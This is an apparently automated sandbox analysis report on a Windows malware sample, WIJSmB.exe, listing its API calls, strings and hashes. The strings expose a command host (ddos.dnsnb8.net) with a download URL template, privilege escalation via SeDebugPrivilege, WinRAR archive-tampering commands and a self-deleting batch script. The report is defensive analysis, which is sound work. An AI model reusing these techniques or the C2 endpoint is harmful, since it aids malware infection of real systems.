                                                                                                                  control_flow_graph 409 4a6159-4a6189 VirtualFree 410 4a618c-4a6192 409->410 411 4a6198-4a61b0 VirtualFree 410->411 412 4a60c7-4a60cf 410->412 414 4a61ba-4a61c8 411->414 415 4a61b2-4a61b4 411->415 412->410 413 4a60d5-4a60f8 VirtualAlloc 412->413 432 4a60fa-4a60fc call 4a66c8 413->432 433 4a60fe-4a6106 413->433 416 4a61ca-4a61d7 414->416 417 4a6243-4a6251 414->417 415->414 419 4a61dd-4a61e0 416->419 421 4a6253 417->421 422 4a6264-4a626f 417->422 419->417 424 4a61e2-4a61f2 419->424 423 4a6255-4a6258 421->423 425 4a6271-4a6276 422->425 423->422 427 4a625a-4a6262 423->427 428 4a61f5-4a61fe 424->428 429 4a6389-4a63b1 VirtualProtect 425->429 430 4a627c-4a6289 425->430 427->423 434 4a620c-4a6219 428->434 435 4a6200-4a6203 428->435 436 4a63b7-4a63ba 429->436 451 4a628b 430->451 452 4a6292-4a6298 430->452 432->433 438 4a6108-4a611d 433->438 439 4a6155-4a6189 VirtualFree 433->439 443 4a6238-4a623f 434->443 440 4a621b-4a6228 435->440 441 4a6205-4a6208 435->441 444 4a63fc-4a6416 VirtualProtect 436->444 445 4a63bc-4a63c2 436->445 446 4a611f-4a6121 438->446 439->410 440->443 449 4a622a-4a6236 441->449 450 4a620a 441->450 443->428 453 4a6241 443->453 447 4a6418-4a641d 444->447 448 4a6420-4a6425 444->448 445->445 454 4a63c4 445->454 456 4a6123 446->456 457 4a6151-4a6154 446->457 449->443 450->443 451->452 458 4a62a2-4a62ac 452->458 453->419 454->444 459 4a63c6-4a63cf 454->459 456->457 460 4a6125-4a6128 456->460 457->439 461 4a62ae 458->461 462 4a62b1-4a62c8 458->462 463 4a63d1 459->463 464 4a63d4-4a63d8 459->464 467 4a612a-4a612e 460->467 468 4a6134-4a613b 460->468 461->462 469 4a62ce-4a62d4 462->469 470 4a6373-4a6384 462->470 463->464 465 4a63da 464->465 466 4a63dd-4a63e1 464->466 465->466 471 4a63e3 466->471 472 4a63e7-4a63fa VirtualProtect 466->472 467->468 477 4a6130-4a6132 467->477 468->477 478 4a613d-4a614f 468->478 475 4a62da-4a62f1 469->475 476 4a62d6-4a62d9 469->476 470->425 471->472 472->436 472->444 480 4a62f3-4a62f9 475->480 481 4a6365-4a636e 475->481 476->475 477->446 478->446 482 4a62fb-4a630f 480->482 483 4a6314-4a6326 480->483 481->458 484 4a6426-4a64a9 482->484 485 4a6328-4a634a 483->485 486 4a634c-4a6360 483->486 494 4a64ab-4a64c0 484->494 495 4a6519-4a651c 484->495 485->481 486->484 501 4a64c2 494->501 502 4a6535-4a6537 494->502 496 4a651d-4a651e 495->496 497 4a6583-4a6587 495->497 500 4a6522-4a6533 496->500 499 4a6588-4a658b 497->499 503 4a658d-4a658f 499->503 504 4a65a1-4a65a3 499->504 500->502 507 4a64f8 501->507 508 4a64c5-4a64cd 501->508 505 4a659a 502->505 506 4a6539 502->506 509 4a6591-4a6593 503->509 512 4a659b-4a659d 505->512 510 4a653b-4a6541 506->510 511 4a65b4 506->511 515 4a64fa-4a64fe 507->515 516 4a656c-4a656f 507->516 513 4a64cf-4a64d4 508->513 514 4a6542-4a6545 508->514 509->512 517 4a6595 509->517 510->514 522 4a65be-4a65db 511->522 512->509 518 4a659f 512->518 519 4a64d6-4a64d9 513->519 520 4a6517-4a6518 513->520 521 4a654d-4a6550 514->521 523 4a6572 515->523 524 4a6500 515->524 516->523 517->505 518->499 519->521 527 4a64db-4a64f5 519->527 520->495 521->522 528 4a6552-4a6556 521->528 529 4a65dd-4a65f6 522->529 525 4a6573-4a6576 523->525 524->500 526 4a6502 524->526 531 4a6578-4a657a 525->531 526->525 532 4a6504-4a6513 526->532 527->507 528->531 533 4a6558-4a6569 528->533 530 4a65f7-4a6608 529->530 531->529 534 4a657c 531->534 532->502 535 4a6515 532->535 533->516 534->530 536 4a657e-4a657f 534->536 535->520 536->497
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 004A60DF
                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 004A6189
                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004A61A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$Free$Alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1852963964-0
                                                                                                                  • Opcode ID: 317cb730c9675695a33fbb184b967fbeb5c30b81299bb6a62209cd85215d4730
                                                                                                                  • Instruction ID: 5b7038244f74af55432d0703c886e6915f8790298a4580d8040d251ec4e8fcef
                                                                                                                  • Opcode Fuzzy Hash: 317cb730c9675695a33fbb184b967fbeb5c30b81299bb6a62209cd85215d4730
                                                                                                                  • Instruction Fuzzy Hash: F1118B32A00649CFCB319E58CC853DE37A1FF12300F6E042ADE895B391DA792981CB98
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,?,?,004A13EF), ref: 004A11AB
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,004A13EF,?,?,?,?,?,?,004A13EF), ref: 004A11BB
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(004A13EF,00000000,?,00000010,00000000,00000000), ref: 004A11EB
                                                                                                                  • CloseHandle.KERNEL32(004A13EF), ref: 004A11FA
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,004A13EF), ref: 004A1203
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A11A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                  • API String ID: 75692138-2915634642
                                                                                                                  • Opcode ID: 2031473365426f7a72cc44d75f4c3eff44c31d4f8fa7f3b0958c70dd3fce6823
                                                                                                                  • Instruction ID: 15418a52f47bd02cdc67ffe9a21e45e755e37882f8dc1b41716fedaa50a91cb9
                                                                                                                  • Opcode Fuzzy Hash: 2031473365426f7a72cc44d75f4c3eff44c31d4f8fa7f3b0958c70dd3fce6823
                                                                                                                  • Instruction Fuzzy Hash: BD01E875904209EFEB00DFD4CD89AAEBFB8FB0A305F104469F606A2250E7759F449B54
                                                                                                                  APIs
                                                                                                                  • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A13BC
                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004A13DA
                                                                                                                  • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 004A1448
                                                                                                                    • Part of subcall function 004A119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,?,?,004A13EF), ref: 004A11AB
                                                                                                                    • Part of subcall function 004A119F: OpenProcessToken.ADVAPI32(00000000,00000028,004A13EF,?,?,?,?,?,?,004A13EF), ref: 004A11BB
                                                                                                                    • Part of subcall function 004A119F: AdjustTokenPrivileges.ADVAPI32(004A13EF,00000000,?,00000010,00000000,00000000), ref: 004A11EB
                                                                                                                    • Part of subcall function 004A119F: CloseHandle.KERNEL32(004A13EF), ref: 004A11FA
                                                                                                                    • Part of subcall function 004A119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,004A13EF), ref: 004A1203
                                                                                                                  Strings
                                                                                                                  • SeDebugPrivilege, xrefs: 004A13D3
                                                                                                                  • C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A13A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe$SeDebugPrivilege
                                                                                                                  • API String ID: 4123949106-4065653571
                                                                                                                  • Opcode ID: bf8cb829a71e3a9b6ff3e17ba0f82f0423a4af50e62a024bf2155caf6eaafe65
                                                                                                                  • Instruction ID: 5571eb9dc3825ecce533477a282170bba5c58e0d5077c4ad2e5773b0a74e2010
                                                                                                                  • Opcode Fuzzy Hash: bf8cb829a71e3a9b6ff3e17ba0f82f0423a4af50e62a024bf2155caf6eaafe65
                                                                                                                  • Instruction Fuzzy Hash: FD314071D00209AAEF209FA68C45FEFBBB9EB5A705F20406BE505B2151D6349E45CB64
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                                                                  • Instruction ID: 0caa1733521371d7b7b9a4c7e9bb24d9c59dc7783d663fe92585ac8642537fe3
                                                                                                                  • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                                                                  • Instruction Fuzzy Hash: EA819471204B418FC714CF29C8906A7B7E2EFE6314F19C92EE4EA87751D738A849CB58
                                                                                                                  APIs
                                                                                                                  • strstr.MSVCRT ref: 004A23CC
                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004A2464
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004A2472
                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000), ref: 004A24A8
                                                                                                                  • memset.MSVCRT ref: 004A24B9
                                                                                                                  • strrchr.MSVCRT ref: 004A24C9
                                                                                                                  • wsprintfA.USER32 ref: 004A24DE
                                                                                                                  • strrchr.MSVCRT ref: 004A24ED
                                                                                                                  • memset.MSVCRT ref: 004A24F2
                                                                                                                  • memset.MSVCRT ref: 004A2505
                                                                                                                  • wsprintfA.USER32 ref: 004A2524
                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 004A2535
                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 004A255D
                                                                                                                  • memset.MSVCRT ref: 004A256E
                                                                                                                  • wsprintfA.USER32 ref: 004A2585
                                                                                                                  • memset.MSVCRT ref: 004A25A6
                                                                                                                  • wsprintfA.USER32 ref: 004A25CA
                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 004A25D0
                                                                                                                  • Sleep.KERNEL32(000007D0,?,?), ref: 004A25E5
                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004A25FC
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 004A2611
                                                                                                                  • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 004A2642
                                                                                                                  • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 004A265B
                                                                                                                  • SetEndOfFile.KERNEL32 ref: 004A266D
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004A2676
                                                                                                                  • RemoveDirectoryA.KERNEL32(?), ref: 004A2681
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                                                                  • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                                                                                  • API String ID: 2203340711-2750826870
                                                                                                                  • Opcode ID: fe7f144f6cfee01bed6a5ed9aca7c2099c43734b00dd62681c2cc4979e8a2792
                                                                                                                  • Instruction ID: 0a7328a87e86aa305cc5471bfa3feb75c83496f3918dfae205913a51ccd4c8c5
                                                                                                                  • Opcode Fuzzy Hash: fe7f144f6cfee01bed6a5ed9aca7c2099c43734b00dd62681c2cc4979e8a2792
                                                                                                                  • Instruction Fuzzy Hash: 6381D1B1408304BBD710DF64DC45FAFBBECEBDA715F00052AF644D2190E7B89A499B6A
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004A2766
                                                                                                                  • memset.MSVCRT ref: 004A2774
                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 004A2787
                                                                                                                  • wsprintfA.USER32 ref: 004A27AB
                                                                                                                    • Part of subcall function 004A185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,004A1118), ref: 004A1867
                                                                                                                    • Part of subcall function 004A185B: srand.MSVCRT ref: 004A1878
                                                                                                                    • Part of subcall function 004A185B: rand.MSVCRT ref: 004A1880
                                                                                                                    • Part of subcall function 004A185B: srand.MSVCRT ref: 004A1890
                                                                                                                    • Part of subcall function 004A185B: rand.MSVCRT ref: 004A1894
                                                                                                                  • wsprintfA.USER32 ref: 004A27C6
                                                                                                                  • CopyFileA.KERNEL32(?,004A4C80,00000000), ref: 004A27D4
                                                                                                                  • wsprintfA.USER32 ref: 004A27F4
                                                                                                                    • Part of subcall function 004A1973: PathFileExistsA.SHLWAPI(\NJ`NJ,00000000,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A1992
                                                                                                                    • Part of subcall function 004A1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004A19BA
                                                                                                                    • Part of subcall function 004A1973: Sleep.KERNEL32(00000064), ref: 004A19C6
                                                                                                                    • Part of subcall function 004A1973: wsprintfA.USER32 ref: 004A19EC
                                                                                                                    • Part of subcall function 004A1973: CopyFileA.KERNEL32(?,?,00000000), ref: 004A1A00
                                                                                                                    • Part of subcall function 004A1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A1A1E
                                                                                                                    • Part of subcall function 004A1973: GetFileSize.KERNEL32(?,00000000), ref: 004A1A2C
                                                                                                                    • Part of subcall function 004A1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004A1A46
                                                                                                                    • Part of subcall function 004A1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004A1A65
                                                                                                                  • DeleteFileA.KERNEL32(?,?,004A4E54,004A4E58), ref: 004A281A
                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,004A4E54,004A4E58), ref: 004A2832
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                                                                  • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                                                                  • API String ID: 692489704-613076915
                                                                                                                  • Opcode ID: 03b9bf8263f9a5ad9d188064c2dfd6339d7484ee30bc5c1cd3cee809019b1b82
                                                                                                                  • Instruction ID: bb65327635c3b7b2992510e94eb779a7b4004af829c3f2b187b500a641e4e8e6
                                                                                                                  • Opcode Fuzzy Hash: 03b9bf8263f9a5ad9d188064c2dfd6339d7484ee30bc5c1cd3cee809019b1b82
                                                                                                                  • Instruction Fuzzy Hash: E621A7F6D4021C7BEB10EBA49C89FDB776CDB66719F0005A7B604E2041F6B8DF448A68
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004A185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,004A1118), ref: 004A1867
                                                                                                                    • Part of subcall function 004A185B: srand.MSVCRT ref: 004A1878
                                                                                                                    • Part of subcall function 004A185B: rand.MSVCRT ref: 004A1880
                                                                                                                    • Part of subcall function 004A185B: srand.MSVCRT ref: 004A1890
                                                                                                                    • Part of subcall function 004A185B: rand.MSVCRT ref: 004A1894
                                                                                                                  • wsprintfA.USER32 ref: 004A15AA
                                                                                                                  • wsprintfA.USER32 ref: 004A15C6
                                                                                                                  • lstrlen.KERNEL32(?), ref: 004A15D2
                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 004A15EE
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 004A1609
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004A1612
                                                                                                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004A162D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                                                                  • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WIJSmB.exe$open
                                                                                                                  • API String ID: 617340118-1533954134
                                                                                                                  • Opcode ID: 8a4c745c3149b512092aa286c61459e8dbf7ed10e6a4e6471ae17a32aac36388
                                                                                                                  • Instruction ID: 653a1838665e399c378b65f47bb8ddbe1394830db22ef3fa0f04d7ca59d58685
                                                                                                                  • Opcode Fuzzy Hash: 8a4c745c3149b512092aa286c61459e8dbf7ed10e6a4e6471ae17a32aac36388
                                                                                                                  • Instruction Fuzzy Hash: CC11A772A011287BD7209BA49C89EEB7F6CDF6B311F000062F549E2040EA749F848BB8
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,004A1400), ref: 004A1226
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004A122D
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,004A1400), ref: 004A123F
                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,004A1400), ref: 004A1250
                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,004A1400), ref: 004A129E
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,004A1400), ref: 004A12B0
                                                                                                                  • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,004A1400), ref: 004A12F5
                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,004A1400), ref: 004A130A
                                                                                                                  Strings
                                                                                                                  • ntdll.dll, xrefs: 004A1219
                                                                                                                  • ZwQuerySystemInformation, xrefs: 004A1212
                                                                                                                  • C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A1262
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe$ZwQuerySystemInformation$ntdll.dll
                                                                                                                  • API String ID: 1500695312-2805263023
                                                                                                                  • Opcode ID: d8e23c32fe55573f4ca904b049126645eba80bc6d912bbb5f22fcbb321e53db6
                                                                                                                  • Instruction ID: 922ff6d232d3f4bc5a9f2702ffedb891710b36254e0fb3ba60ad136e680fb2e8
                                                                                                                  • Opcode Fuzzy Hash: d8e23c32fe55573f4ca904b049126645eba80bc6d912bbb5f22fcbb321e53db6
                                                                                                                  • Instruction Fuzzy Hash: 2C210972609311ABD7209F54CC04F6BBEA8FB97B01F10092AF545F6290D774D940C7AD
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004A18B1
                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 004A18D3
                                                                                                                  • CloseHandle.KERNEL32(I%J), ref: 004A18E9
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004A18F0
                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 004A1901
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004A190A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                                                                  • String ID: I%J
                                                                                                                  • API String ID: 876959470-4277147444
                                                                                                                  • Opcode ID: 063734148c8c76338de6d1460c4a758613c5df4351fcc63673e341595dd1cbdd
                                                                                                                  • Instruction ID: 273c1d4ccbdd8534e26abcb7d327f0c65ee5e14185f21df1e74afc39cfde98cf
                                                                                                                  • Opcode Fuzzy Hash: 063734148c8c76338de6d1460c4a758613c5df4351fcc63673e341595dd1cbdd
                                                                                                                  • Instruction Fuzzy Hash: 4601BC72900128BBCB20AF96DC08DDFBF3DEF86331F004022FA15A11A4D2354A18CAA4
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,004A1118), ref: 004A1867
                                                                                                                  • srand.MSVCRT ref: 004A1878
                                                                                                                  • rand.MSVCRT ref: 004A1880
                                                                                                                  • srand.MSVCRT ref: 004A1890
                                                                                                                  • rand.MSVCRT ref: 004A1894
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timerandsrand$FileSystem
                                                                                                                  • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                  • API String ID: 4106363736-3273462101
                                                                                                                  • Opcode ID: 99feb8c64e310b6216819a6c4dc7e9d8da58b91c58b5faaeb088befd24bd2945
                                                                                                                  • Instruction ID: 6173bacedae3bf9512857555a57ce14b3ba0418b2ea7140529a015d34f1f3c12
                                                                                                                  • Opcode Fuzzy Hash: 99feb8c64e310b6216819a6c4dc7e9d8da58b91c58b5faaeb088befd24bd2945
